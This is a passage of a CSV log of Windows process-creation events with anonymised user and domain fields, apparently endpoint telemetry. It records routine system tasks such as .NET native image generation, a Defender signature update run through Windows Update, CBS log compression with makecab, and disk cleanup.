01:02:10.114937600+00:00,16480,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:11.228118900+00:00,2021-06-24 01:03:58.384525900+00:00,144de296-9793-4534-a52d-8a54caeffc41,computerpii_0a470890c60768167990033d701e7bd881398861,169926,False,10.7740.19041.1052,False,11540474045175469,,11540474045175474,2021-06-24 01:02:10.914942500+00:00,11236,2021-06-24 01:02:10.914942500+00:00,ngen.exe,11236,18688,TerminateProcessStartkey,C:\Windows\Microsoft.NET\Framework\v4.0.30319,144344,2020-12-02 21:00:07+00:00,2020-12-02 22:45:24+00:00,2021-06-24 01:02:10.471373500+00:00,2021-02-17 04:29:15.829464400+00:00,2176,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,ngen.exe,ngen.exe,Microsoft Common Language Runtime native compiler,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,mscorsvw.exe,mscorsvw.exe,.NET Runtime Optimization Service
+1096,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:11.199591500+00:00,14944,AM_Delta_Patch_1.341.1260.0.exe,"""AM_Delta_Patch_1.341.1260.0.exe"" WD /q",PortableExecutable,2021-06-24 01:02:11.107440300+00:00,C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.341.1260.0.exe,2408912,06cb2959485b4e1e89932a9e24d6abbf,e1bca108d7806225a10b18c9b43019c92d8d8e47d75bc52cfabf3b6ba8d30dee,42bfeb43f02d54463d72ac67b05d70511d5a4d64,970600bd493cac68a5b1efe9dbb626f9,2423ce1293c1980ee7dd4543efeb48b69634dbce875c830e7f8cd87f3c6d25b4,3f5c88006e75e1fbbd8de658d1d66aeac432de75,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:02:11.063472800+00:00,13624,wuauclt.exe,"""wuauclt.exe"" /UpdateDeploymentProvider UpdateDeploymentProvider.dll /ClassId dcebf50d-ef94-4e82-bad2-efed343148d4 /RunHandlerComServer",True,2021-06-10 00:48:10.634688500+00:00,13224,\Device\HarddiskVolume3\Windows\System32\MoUsoCoreWorker.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:11.400140600+00:00,2021-06-24 01:03:58.384986600+00:00,b97f0758-5d82-46fb-9aff-d697317493a1,computerpii_0a470890c60768167990033d701e7bd881398861,169931,False,10.7740.19041.1052,False,11540474045175471,,11540474045175475,2021-06-24 01:02:11.063472800+00:00,13624,2021-06-24 01:02:11.063472800+00:00,\Device\HarddiskVolume3\Windows\System32\wuauclt.exe,13624,128,ActiveProcessStartkey,C:\Windows\System32,64008,1970-11-28 05:49:59+00:00,2021-04-14 01:10:16.555182500+00:00,2021-06-24 01:02:11.054063800+00:00,2021-04-14 01:10:16.553201900+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,wuauclt.exe,wuauclt.exe,Windows Update,Microsoft Corporation,Microsoft Malware Protection,1.341.1331.0,AM_Delta_Patch_1.341.1260.0.exe,AM_Delta_Patch_1.341.1260.0.exe,Microsoft Antimalware WU Stub
+1097,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:11.242539+00:00,4236,MpSigStub.exe,MpSigStub.exe /stub 1.1.17800.4 /payload 1.341.1331.0 /MpWUStub /program C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.341.1260.0.exe WD /q,PortableExecutable,2020-11-11 01:11:41.879252300+00:00,C:\Windows\System32\MpSigStub.exe,799104,5221b7a59665153028fb57761ce560b9,0bc408c801441239f72d7df3dd6edbcdfb5313d6ae5a04c0a13e8c2dfc39f6d8,d65eae951fe09f39555951970ad03737520c7b12,06cb2959485b4e1e89932a9e24d6abbf,e1bca108d7806225a10b18c9b43019c92d8d8e47d75bc52cfabf3b6ba8d30dee,42bfeb43f02d54463d72ac67b05d70511d5a4d64,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:02:11.199591500+00:00,14944,AM_Delta_Patch_1.341.1260.0.exe,"""AM_Delta_Patch_1.341.1260.0.exe"" WD /q",True,2021-06-24 01:02:11.063472800+00:00,13624,\Device\HarddiskVolume3\Windows\System32\wuauclt.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:11.404799800+00:00,2021-06-24 01:03:58.385070100+00:00,c88e225f-a7ef-4fa2-9f3d-03eb797f525c,computerpii_0a470890c60768167990033d701e7bd881398861,169932,False,10.7740.19041.1052,False,11540474045175475,,11540474045175476,2021-06-24 01:02:11.199591500+00:00,14944,2021-06-24 01:02:11.199591500+00:00,\Device\HarddiskVolume3\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.341.1260.0.exe,14944,128,ActiveProcessStartkey,C:\Windows\SoftwareDistribution\Download\Install,2408912,2021-06-23 20:28:45+00:00,2021-06-24 00:54:55.259907600+00:00,2021-06-24 01:02:11.270164900+00:00,2021-06-24 01:02:11.107440300+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Malware Protection,1.341.1331.0,AM_Delta_Patch_1.341.1260.0.exe,AM_Delta_Patch_1.341.1260.0.exe,Microsoft Antimalware WU Stub,Microsoft Corporation,Microsoft Malware Protection,1.1.17800.4,MpSigStub.exe,MpSigStub.exe,Microsoft Malware Protection Signature Update Stub
+1098,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:02:11.395485200+00:00,13348,ngentask.exe,"""NGenTask.exe"" /StopEvent:1344",PortableExecutable,2021-02-17 04:29:20.504956500+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe,79312,3142937610966b092ca8886c76a3b113,ff70c1b71440e34931eb8ef97236f3cb2bb2668c72e7a3338660ced5c0753af8,ea8ff42f1d5346532a42bc345dd25652ba63a850,3142937610966b092ca8886c76a3b113,ff70c1b71440e34931eb8ef97236f3cb2bb2668c72e7a3338660ced5c0753af8,ea8ff42f1d5346532a42bc345dd25652ba63a850,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:02:10.143321300+00:00,2532,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:616",True,2021-06-24 01:02:09.710620600+00:00,15832,taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:11.459866200+00:00,2021-06-24 01:03:58.385227100+00:00,3610f94b-301f-450d-9fba-65b9dd641427,computerpii_0a470890c60768167990033d701e7bd881398861,169934,False,10.7740.19041.1052,False,11540474045175458,,11540474045175477,2021-06-24 01:02:10.143321300+00:00,2532,2021-06-24 01:02:10.143321300+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe,2532,128,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,79312,2020-12-02 20:58:24+00:00,2020-12-02 22:38:14.543933300+00:00,2021-06-24 01:02:10.199206200+00:00,2021-02-17 04:29:20.504956500+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service
+1099,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:02:11.402514400+00:00,380,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,3142937610966b092ca8886c76a3b113,ff70c1b71440e34931eb8ef97236f3cb2bb2668c72e7a3338660ced5c0753af8,ea8ff42f1d5346532a42bc345dd25652ba63a850,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 01:02:11.395485200+00:00,13348,ngentask.exe,"""NGenTask.exe"" /StopEvent:1344",False,2021-06-24 01:02:10.143321300+00:00,2532,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:11.460266100+00:00,2021-06-24 01:03:58.385307900+00:00,7ce022c6-95dc-40a8-8543-8d8b9b0af356,computerpii_0a470890c60768167990033d701e7bd881398861,169935,False,10.7740.19041.1052,False,11540474045175477,,11540474045175478,2021-06-24 01:02:11.395485200+00:00,13348,2021-06-24 01:02:11.395485200+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe,13348,128,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,79312,2020-12-02 20:58:24+00:00,2020-12-02 22:38:14.543933300+00:00,2021-06-24 01:02:10.199206200+00:00,2021-02-17 04:29:20.504956500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1100,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:02:11.420686200+00:00,9900,ngentask.exe,"""NGenTask.exe"" /StopEvent:1188",PortableExecutable,2021-02-17 04:29:20.532877500+00:00,C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,79816,ae933850c93d3b3001ab21bb65c3efa1,21cfa6bbc96779923e21ca05f14a32ab24cf45eb0c448aa0c4f60b71635924d8,fb4bebba7a1407c6d3931f77fd721cffee78ddd2,ae933850c93d3b3001ab21bb65c3efa1,21cfa6bbc96779923e21ca05f14a32ab24cf45eb0c448aa0c4f60b71635924d8,fb4bebba7a1407c6d3931f77fd721cffee78ddd2,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:02:10.114937600+00:00,16480,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:660",True,2021-06-24 01:02:09.710620600+00:00,15832,taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:11.461375800+00:00,2021-06-24 01:03:58.385387500+00:00,678038ef-c62f-4a0f-a030-758227e759a7,computerpii_0a470890c60768167990033d701e7bd881398861,169936,False,10.7740.19041.1052,False,11540474045175457,,11540474045175479,2021-06-24 01:02:10.114937600+00:00,16480,2021-06-24 01:02:10.114937600+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,16480,128,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework\v4.0.30319,79816,2020-12-02 21:00:19+00:00,2020-12-02 22:45:24+00:00,2021-06-24 01:02:10.209323600+00:00,2021-02-17 04:29:20.532877500+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service
+1101,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:02:11.428515500+00:00,10640,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,ae933850c93d3b3001ab21bb65c3efa1,21cfa6bbc96779923e21ca05f14a32ab24cf45eb0c448aa0c4f60b71635924d8,fb4bebba7a1407c6d3931f77fd721cffee78ddd2,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 01:02:11.420686200+00:00,9900,ngentask.exe,"""NGenTask.exe"" /StopEvent:1188",False,2021-06-24 01:02:10.114937600+00:00,16480,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:11.462043600+00:00,2021-06-24 01:03:58.385463800+00:00,0b4cb9b7-568d-4b35-98ee-8f7678e2930a,computerpii_0a470890c60768167990033d701e7bd881398861,169937,False,10.7740.19041.1052,False,11540474045175479,,11540474045175480,2021-06-24 01:02:11.420686200+00:00,9900,2021-06-24 01:02:11.420686200+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,9900,16512,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework\v4.0.30319,79816,2020-12-02 21:00:19+00:00,2020-12-02 22:45:24+00:00,2021-06-24 01:02:10.209323600+00:00,2021-02-17 04:29:20.532877500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1102,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:11.531383500+00:00,8472,makecab.exe,"""makecab.exe"" C:\Windows\Logs\CBS\FilePII_013041f568b01f2cbf5d2611abc9f3d226890e6b.log C:\Windows\Logs\CBS\CbsPersist_20210621073834.cab",PortableExecutable,2019-12-07 09:08:46.175635700+00:00,C:\Windows\System32\makecab.exe,86528,ff47e32b1b45d1de2ecc39107b365563,ba31ad8eca19c5fe03f6a5c64c8e0adfc7bd8d04b1f4e1c11d167467fd5261e9,a8b93562abc7f0d7252ee9a01e335a3fcecdd30b,7d0c2a24dca67dde6d573e23871f5f0b,18a56c58b18030c70492189d7de2d1813e363b1fb6c59756b4e81e1071492a0e,2bc1a72ad7abb1b0008d961b8278f02289a41028,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 00:54:25.737133100+00:00,11908,TiWorker.exe,TiWorker.exe -Embedding,True,2021-06-10 00:46:10.653932100+00:00,504,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:11.607120300+00:00,2021-06-24 01:03:58.385999400+00:00,31b4ef0a-38bd-4974-a097-c3c4bccf7a55,computerpii_0a470890c60768167990033d701e7bd881398861,169944,False,10.7740.19041.1052,False,11540474045175324,,11540474045175481,2021-06-24 00:54:25.737133100+00:00,11908,2021-06-24 00:54:25.737133100+00:00,\Device\HarddiskVolume3\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1022_none_7e372e9e7c6ecccb\TiWorker.exe,11908,128,ActiveProcessStartkey,C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1022_none_7e372e9e7c6ecccb,239432,2026-12-16 19:42:14+00:00,2021-05-11 05:04:17.383161500+00:00,2021-06-24 00:54:25.771043700+00:00,2021-06-09 01:15:48.791212900+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1022,TiWorker.exe,TiWorker.exe,Windows Modules Installer Worker,Microsoft Corporation,Microsoft® Windows® Operating System,5.00,makecab.exe,makecab.exe,Microsoft® Cabinet Maker
+1103,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:11.535972700+00:00,17324,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,ff47e32b1b45d1de2ecc39107b365563,ba31ad8eca19c5fe03f6a5c64c8e0adfc7bd8d04b1f4e1c11d167467fd5261e9,a8b93562abc7f0d7252ee9a01e335a3fcecdd30b,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:02:11.531383500+00:00,8472,makecab.exe,"""makecab.exe"" C:\Windows\Logs\CBS\FilePII_013041f568b01f2cbf5d2611abc9f3d226890e6b.log C:\Windows\Logs\CBS\CbsPersist_20210621073834.cab",True,2021-06-24 00:54:25.737133100+00:00,11908,\Device\HarddiskVolume3\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1022_none_7e372e9e7c6ecccb\TiWorker.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:11.607719500+00:00,2021-06-24 01:03:58.386073500+00:00,16b03c82-3b08-43df-80df-648ad6af7a60,computerpii_0a470890c60768167990033d701e7bd881398861,169945,False,10.7740.19041.1052,False,11540474045175481,,11540474045175482,2021-06-24 01:02:11.531383500+00:00,8472,2021-06-24 01:02:11.531383500+00:00,\Device\HarddiskVolume3\Windows\System32\makecab.exe,8472,128,ActiveProcessStartkey,C:\Windows\System32,86528,2034-01-29 18:58:12+00:00,2019-12-07 09:08:46.175635700+00:00,2021-06-24 01:02:09.745850200+00:00,2019-12-07 09:08:46.175635700+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,5.00,makecab.exe,makecab.exe,Microsoft® Cabinet Maker,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1104,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-24 01:02:12.397528300+00:00,12440,DismHost.exe,dismhost.exe {F4911E27-2E50-4D03-8C34-2E75918E5F52},PortableExecutable,2021-06-24 01:02:12.125313600+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Temp\FB91866E-C9F3-47F8-8F85-E432053511F8\DismHost.exe,146256,e5d5e9c1f65b8ec7aa5b7f1b1acdd731,e30508e2088bc16b2a84233ced64995f738deaef2366ac6c86b35c93bbcd9d80,dbb14dcda6502ab1d23a7c77d405dafbcbeb439e,ef759fbf8aee871c4accac4a2ef8f9ee,87d5153bec20f9b2e61fb6c6e4f0e49e48ae50691912ce793a599299d31ef671,c94b3634bbf439181de566c1837969daa7b26f70,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 01:02:09.812148900+00:00,18684,cleanmgr.exe,cleanmgr.exe /autoclean /d C:,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:12.641856700+00:00,2021-06-24 01:03:58.390389500+00:00,90738bc8-80c5-400d-b2e2-f47a235b06eb,computerpii_0a470890c60768167990033d701e7bd881398861,170002,False,10.7740.19041.1052,False,11540474045175452,,11540474045175483,2021-06-24 01:02:09.812148900+00:00,18684,2021-06-24 01:02:09.812148900+00:00,cleanmgr.exe,18684,256,ActiveProcessStartkey,C:\Windows\System32,320000,1983-10-25 17:51:00+00:00,2021-04-14 01:10:31.036813600+00:00,2021-06-24 01:02:09.814856300+00:00,2021-04-14 01:10:31.033943500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423917,433423917,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,CLEANMGR,CLEANMGR.DLL,Disk Space Cleanup Manager for Windows,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,dismhost,DismHost.exe,Dism Host Servicing Process
+1105,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:12.591028300+00:00,3256,makecab.exe,"""makecab.exe"" C:\Windows\Logs\CBS\FilePII_10576597866791826ea798bac3b617575b6353f5.log C:\Windows\Logs\CBS\CbsPersist_20210622045327.cab",PortableExecutable,2019-12-07 09:08:46.175635700+00:00,C:\Windows\System32\makecab.exe,86528,ff47e32b1b45d1de2ecc39107b365563,ba31ad8eca19c5fe03f6a5c64c8e0adfc7bd8d04b1f4e1c11d167467fd5261e9,a8b93562abc7f0d7252ee9a01e335a3fcecdd30b,7d0c2a24dca67dde6d573e23871f5f0b,18a56c58b18030c70492189d7de2d1813e363b1fb6c59756b4e81e1071492a0e,2bc1a72ad7abb1b0008d961b8278f02289a41028,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 00:54:25.737133100+00:00,11908,TiWorker.exe,TiWorker.exe -Embedding,True,2021-06-10 00:46:10.653932100+00:00,504,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:12.753919+00:00,2021-06-24 01:03:58.390606200+00:00,069a3573-c5e4-435b-8667-6505404bb897,computerpii_0a470890c60768167990033d701e7bd881398861,170005,False,10.7740.19041.1052,False,11540474045175324,,11540474045175484,2021-06-24 00:54:25.737133100+00:00,11908,2021-06-24 00:54:25.737133100+00:00,TiWorker.exe,11908,16640,ActiveProcessStartkey,C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1022_none_7e372e9e7c6ecccb,239432,2026-12-16 19:42:14+00:00,2021-05-11 05:04:17.383161500+00:00,2021-06-24 00:54:25.771043700+00:00,2021-06-09 01:15:48.791212900+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1022,TiWorker.exe,TiWorker.exe,Windows Modules Installer Worker,Microsoft Corporation,Microsoft® Windows® Operating System,5.00,makecab.exe,makecab.exe,Microsoft® Cabinet Maker
+1106,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:12.599162800+00:00,15332,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,ff47e32b1b45d1de2ecc39107b365563,ba31ad8eca19c5fe03f6a5c64c8e0adfc7bd8d04b1f4e1c11d167467fd5261e9,a8b93562abc7f0d7252ee9a01e335a3fcecdd30b,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:02:12.591028300+00:00,3256,makecab.exe,"""makecab.exe"" C:\Windows\Logs\CBS\FilePII_10576597866791826ea798bac3b617575b6353f5.log C:\Windows\Logs\CBS\CbsPersist_20210622045327.cab",True,2021-06-24 00:54:25.737133100+00:00,11908,TiWorker.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:12.754261+00:00,2021-06-24 01:03:58.390687200+00:00,daf87c83-84ad-440e-8db7-5c4899ccfd5d,computerpii_0a470890c60768167990033d701e7bd881398861,170006,False,10.7740.19041.1052,False,11540474045175484,,11540474045175485,2021-06-24 01:02:12.591028300+00:00,3256,2021-06-24 01:02:12.591028300+00:00,\Device\HarddiskVolume3\Windows\System32\makecab.exe,3256,16512,ActiveProcessStartkey,C:\Windows\System32,86528,2034-01-29 18:58:12+00:00,2019-12-07 09:08:46.175635700+00:00,2021-06-24 01:02:12.617709300+00:00,2019-12-07 09:08:46.175635700+00:00,16640,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,5.00,makecab.exe,makecab.exe,Microsoft® Cabinet Maker,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
